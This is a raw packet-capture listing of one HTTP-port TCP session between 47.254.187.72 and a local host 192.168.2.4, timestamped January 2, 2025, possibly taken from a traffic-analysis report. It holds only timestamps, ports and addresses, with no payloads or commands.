                                                                            Jan 2, 2025 20:34:58.064585924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064604044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064616919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064626932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064637899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064649105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064661026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064670086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.064677000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.066633940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066644907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066653967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066663027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.066670895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066680908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066690922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066694021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.066694021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.066701889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.066759109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.066759109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.067378998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067394972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067405939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067415953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067425966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067433119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.067433119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.067440033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067451000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.067466021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.067498922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.067498922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.068109035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068120003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068130016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068145990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068164110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068171978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.068178892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068190098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.068202972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.068242073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.068243027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085011005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085021019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085031986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085043907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085052967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085109949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085120916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085130930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085138083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085138083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085141897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085153103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085164070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085175991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085246086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085256100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085273027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085282087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085293055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085303068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085314035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085325003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085335016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085365057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085380077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085380077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085396051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085406065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085422993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085431099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085448027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085448027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085954905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085964918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085973978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.085979939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.085983992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086003065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.086021900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086033106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086044073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086045980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.086054087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086065054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.086074114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.086086035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.087764025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.091844082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091856956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091871977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091882944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091893911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091905117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091916084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091927052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.091934919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.091934919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.092005014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.094924927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094935894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094948053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094958067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094969034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094975948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.094980001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094990015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.094996929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.095017910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.095757008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.101540089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101551056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101561069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101571083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101588011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101598978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101609945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101619959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.101633072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.103754044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.103923082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103935003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103945971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103956938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103967905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103977919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.103988886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.104001045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.104037046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.104037046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.109075069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109107018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109117985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109127998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109139919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109149933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109162092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.109185934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.111757040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130357027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130369902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130388021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130398035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130408049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130418062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130441904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130455017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130465984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130481958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130489111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130492926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130507946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130513906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130513906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130600929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130611897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130623102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130628109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130631924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.130655050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130686998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.130686998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.142347097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142369986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142379999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142431021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142441034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142452002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142458916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.142462969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.142474890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.143758059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.151307106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151333094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151345015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151354074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151366949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151376009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151387930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.151423931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.151756048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.153386116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153397083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153408051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153440952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153450966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153459072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.153459072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.153465033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153476954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.153501987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154078007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154088020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154104948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154134035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154144049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154155016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154160023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154171944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154182911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154192924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154192924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154194117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154284954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154284954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154887915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154908895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154920101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154930115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154941082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154951096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154962063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.154968023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.154973030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.155021906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.155021906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.171964884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.171982050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.171999931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172010899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172032118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172044039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172055960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172065973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172077894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172107935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172128916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172141075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172154903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172161102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172173977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172178984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172192097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172202110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172204971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172219992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172230959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172240019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172240019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172243118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172254086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172271013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172283888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172307014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172324896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172334909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172347069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172350883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172369003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172842026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172852993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172863960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172868013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172874928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172887087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172887087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172898054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172909021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.172908068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172967911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.172967911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.178744078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178823948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178834915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178848982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178859949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178872108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178884029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.178910017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.179754019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.181734085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181746006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181757927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181767941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181777954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181788921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181799889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181804895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.181808949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.181823969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.181909084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.181909084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.188353062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188365936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188376904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188395977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188407898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188419104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188419104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.188429117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.188473940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.188473940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.190686941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190713882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190726042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190736055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190747976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190758944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190769911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190773964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.190781116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.190804005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.191752911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.195799112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195816040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195827007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195837021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195852041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195861101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195879936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195888996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.195890903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.195904970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.199754000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.217278957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217310905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217328072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217339039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217350006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217360973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217396975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217407942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217418909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217430115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217441082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217452049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217462063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217473984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.217484951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.219765902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.229197025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229218006 CET804973047.254.187.72192.168.2.4
